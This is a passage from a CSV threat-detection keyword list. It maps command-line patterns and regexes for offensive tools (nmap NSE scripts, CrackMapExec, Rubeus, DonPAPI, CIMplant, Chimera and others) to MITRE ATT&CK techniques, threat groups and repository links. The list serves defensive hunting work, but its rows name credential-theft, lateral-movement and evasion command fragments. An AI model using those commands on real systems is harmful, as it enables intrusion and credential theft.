- FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Find-Fruit.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2897" "* riak-http-info.nse*",".{0,1000}\sriak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2898" "* rid_hijack.py*",".{0,1000}\srid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","2899" "* --rid-brute *",".{0,1000}\s\-\-rid\-brute\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2900" "* --rid-brute 2>&1 *.txt*",".{0,1000}\s\-\-rid\-brute\s2\>\&1\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2901" "* --rid-brute*",".{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2902" "* rid-hijack -*",".{0,1000}\srid\-hijack\s\-.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","2903" "* -rl 4 -ta 8 -t 2100 -an AS8560*",".{0,1000}\s\-rl\s4\s\-ta\s8\s\-t\s2100\s\-an\sAS8560.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","2904" "* rlogin-brute.nse*",".{0,1000}\srlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2905" "* --rm -it nachovpn*",".{0,1000}\s\-\-rm\s\-it\snachovpn.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2906" "* --rm -it --name gsocket*",".{0,1000}\s\-\-rm\s\-it\s\-\-name\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2907" "* rm_injection.exe*",".{0,1000}\srm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2908" "* rmi-dumpregistry.nse*",".{0,1000}\srmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2909" "* rmi-vuln-classloader.nse*",".{0,1000}\srmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2910" "* roaster.py*",".{0,1000}\sroaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","2912" "* rockyou.txt *",".{0,1000}\srockyou\.txt\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2913" "* RogueOxidResolver must be run remotely*",".{0,1000}\sRogueOxidResolver\smust\sbe\srun\sremotely.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2914" "* --rogue-smbserver-ip *",".{0,1000}\s\-\-rogue\-smbserver\-ip\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","2915" "* --rogue-smbserver-share *",".{0,1000}\s\-\-rogue\-smbserver\-share\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","2916" "* ropbuffers.go*",".{0,1000}\sropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","2917" "* ropfuscator*",".{0,1000}\sropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","2918" "* rotateproxy *",".{0,1000}\srotateproxy\s.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","2919" "* rotateproxy.service*",".{0,1000}\srotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","2920" "* rpcap-brute.nse*",".{0,1000}\srpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2921" "* rpcap-info.nse*",".{0,1000}\srpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2922" "* rpcdump.py*",".{0,1000}\srpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","2924" "* rpc-grind.nse*",".{0,1000}\srpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2925" "* rpcinfo.nse*",".{0,1000}\srpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2926" "* rsa-vuln-roca.nse*",".{0,1000}\srsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2930" "* rsync-brute.nse*",".{0,1000}\srsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2934" "* rsync-list-modules.nse*",".{0,1000}\srsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2935" "* rt_hijacking.exe*",".{0,1000}\srt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2936" "* rtsp-methods.nse*",".{0,1000}\srtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2937" "* rtsp-url-brute.nse*",".{0,1000}\srtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2938" "* -Rubeus -Command *kerberoast*",".{0,1000}\s\-Rubeus\s\-Command\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2941" "* Rubeus.dll*",".{0,1000}\sRubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","2942" "* Rubeus.ps1*",".{0,1000}\sRubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","2943" "* 
ruler.exe*",".{0,1000}\sruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","2944" "* --rules:Jumbo *",".{0,1000}\s\-\-rules\:Jumbo\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2945" "* run donpapi*",".{0,1000}\srun\sdonpapi.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","2946" "* run netexec *",".{0,1000}\srun\snetexec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2947" "* run nxc smb *",".{0,1000}\srun\snxc\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2948" "* RunasCs.cs*",".{0,1000}\sRunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","2949" "* -runaslsass*",".{0,1000}\s\-runaslsass.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","2950" "* rusers.nse*",".{0,1000}\srusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2951" "* rustbof *",".{0,1000}\srustbof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","2952" "* rusthound.exe*",".{0,1000}\srusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","2954" "* rwf.py *",".{0,1000}\srwf\.py\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","2955" "* -s * -c command_exec --execute *",".{0,1000}\s\-s\s.{0,1000}\s\-c\scommand_exec\s\-\-execute\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2956" "* -s * -c disable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2957" "* -s * -c disable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote 
systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2958" "* -s * -c enable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2959" "* -s * -c enable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2960" "* -s * -c remote_posh *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sremote_posh\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2961" "* -s * --method 1 --function shell_exec --parameters cmd:id*",".{0,1000}\s\-s\s.{0,1000}\s\-\-method\s1\s\-\-function\sshell_exec\s\-\-parameters\scmd\:id.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2962" "* -s *ascii* -b *reverse*invoke-expression*",".{0,1000}\s\-s\s.{0,1000}ascii.{0,1000}\s\-b\s.{0,1000}reverse.{0,1000}invoke\-expression.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","2963" "* -s 127.0.0.1 -e * -a connect -u ntlm*",".{0,1000}\s\-s\s127\.0\.0\.1\s\-e\s.{0,1000}\s\-a\sconnect\s\-u\sntlm.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2964" "* -s putty.exe_sig 